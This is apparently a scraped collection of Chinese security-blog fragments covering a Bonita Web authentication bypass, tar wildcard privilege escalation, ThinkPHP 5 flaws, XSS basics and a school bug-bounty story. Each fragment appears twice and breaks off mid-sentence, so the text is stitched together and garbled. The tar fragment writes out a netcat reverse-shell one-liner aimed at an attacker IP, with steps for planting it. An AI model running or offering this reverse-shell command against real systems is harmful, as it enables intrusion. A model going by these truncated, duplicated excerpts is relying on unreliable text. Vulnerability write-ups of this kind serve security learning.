一、漏洞原理漏洞简述Bonitasoft是一个业务自动化平台，可以更轻松地在业务流程中构建、部署和管理自动化应用程序；Bonita是一个用于业务流程自动化和优化的开源和可扩展平台。BonitaWeb2021.2版本受到认证绕过影响，因为其API认证过滤器的过滤模式过于宽泛。通过添加恶意构造的字符串到APIURL，普通用户可以访问需特权的API端点。这可能导致特权API操作将恶意代码添加至服务器，从而造成RCE攻击。漏洞影响范围供应商：Bonitasoft产品：BonitaPlatform确认受影响版本：修复版本：/社区版：订购版：漏洞分析本漏洞的漏洞点来自系统中web.xml文件，该文件用于定

一、漏洞原理漏洞简述Bonitasoft是一个业务自动化平台，可以更轻松地在业务流程中构建、部署和管理自动化应用程序；Bonita是一个用于业务流程自动化和优化的开源和可扩展平台。BonitaWeb2021.2版本受到认证绕过影响，因为其API认证过滤器的过滤模式过于宽泛。通过添加恶意构造的字符串到APIURL，普通用户可以访问需特权的API端点。这可能导致特权API操作将恶意代码添加至服务器，从而造成RCE攻击。漏洞影响范围供应商：Bonitasoft产品：BonitaPlatform确认受影响版本：修复版本：/社区版：订购版：漏洞分析本漏洞的漏洞点来自系统中web.xml文件，该文件用于定

以普通用户进入目标机后，若是可以运行tar指令，则可以通过以下的方法进行提权原理：tar有通配符*的漏洞，tar用通配符来压缩文件并读取文件名，若是看到有参数则将执行。 操作：1.先cd到一个用户有完全执行命令的文件夹下例如：www-data用户的完全权限文件夹为/var/www/html 2.创建一个reverseshell脚本echo'rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncyou_ip1234>/tmp/f'>shell.shyou_ip为本机IP地址1234为将要监听的端口 3.创建tar将要运行的参数touch"/var/www

以普通用户进入目标机后，若是可以运行tar指令，则可以通过以下的方法进行提权原理：tar有通配符*的漏洞，tar用通配符来压缩文件并读取文件名，若是看到有参数则将执行。 操作：1.先cd到一个用户有完全执行命令的文件夹下例如：www-data用户的完全权限文件夹为/var/www/html 2.创建一个reverseshell脚本echo'rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncyou_ip1234>/tmp/f'>shell.shyou_ip为本机IP地址1234为将要监听的端口 3.创建tar将要运行的参数touch"/var/www

 ThinkPHP框架漏洞thinkphp是一个国内轻量级的开发框架，采用php+apache，在更新迭代中，thinkphp也经常爆出各种漏洞，thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本，前两个版本已经停止更新，主要介绍下thinkphp5的漏洞  漏洞原理ThinkPHP5.0命令执行漏洞Thinkphp5.0版本中没有对路由中的控制器进行严格过滤，没有开启强制路由的情况下可以执行系统命令ThinkPHP5.1x命令执行漏洞在ThinkPHP5.1.23之前的版本中存在SQL注入漏洞，该漏洞是由于程序在处理orderby后的参数

 ThinkPHP框架漏洞thinkphp是一个国内轻量级的开发框架，采用php+apache，在更新迭代中，thinkphp也经常爆出各种漏洞，thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本，前两个版本已经停止更新，主要介绍下thinkphp5的漏洞  漏洞原理ThinkPHP5.0命令执行漏洞Thinkphp5.0版本中没有对路由中的控制器进行严格过滤，没有开启强制路由的情况下可以执行系统命令ThinkPHP5.1x命令执行漏洞在ThinkPHP5.1.23之前的版本中存在SQL注入漏洞，该漏洞是由于程序在处理orderby后的参数

前言：最近一直在挖漏洞，碰到的XSS漏洞最多了，今天就顺便来讲一下，如有错的地方，烦请指出。00×1   什么是XSS漏洞：    XSS又叫CSS(CrossSiteScript)，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。​00×2   XSS漏洞有什么危害：    1、盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号    2、控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力    3、盗窃企业重要的具有商业价值的资料    4、非法转账    

前言：最近一直在挖漏洞，碰到的XSS漏洞最多了，今天就顺便来讲一下，如有错的地方，烦请指出。00×1   什么是XSS漏洞：    XSS又叫CSS(CrossSiteScript)，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。​00×2   XSS漏洞有什么危害：    1、盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号    2、控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力    3、盗窃企业重要的具有商业价值的资料    4、非法转账    

最近呢,也是基础漏洞学的差不多了,就在edusrc上面实战,刚开始搞一些信息泄漏啥的,提交了十几个,结果就他娘的通过了一个.咱也就不碰信息泄漏了,没得意思. 关于这个学校测试时也是有坑的,刚开始找到的统一平台地址登录过之后是废弃的,我当时就以为这后台是不是不用了,然后过了一两个小时,我在做资产搜集的时候,又发现了一个一样的登录点,但是目录不一样了,才发现这狗日的数据是通用的,但是修改后跳转的登录页面确实假的.  第一个漏洞:修改密码判断不严谨.这个就是常说的逻辑漏洞,修改用户密码.功能点是在首页的忘记密码处,这个漏洞利用还是有条件的,需要学号+绑定的邮箱.因为我是有个朋友在这个学校上学,我就通

最近呢,也是基础漏洞学的差不多了,就在edusrc上面实战,刚开始搞一些信息泄漏啥的,提交了十几个,结果就他娘的通过了一个.咱也就不碰信息泄漏了,没得意思. 关于这个学校测试时也是有坑的,刚开始找到的统一平台地址登录过之后是废弃的,我当时就以为这后台是不是不用了,然后过了一两个小时,我在做资产搜集的时候,又发现了一个一样的登录点,但是目录不一样了,才发现这狗日的数据是通用的,但是修改后跳转的登录页面确实假的.  第一个漏洞:修改密码判断不严谨.这个就是常说的逻辑漏洞,修改用户密码.功能点是在首页的忘记密码处,这个漏洞利用还是有条件的,需要学号+绑定的邮箱.因为我是有个朋友在这个学校上学,我就通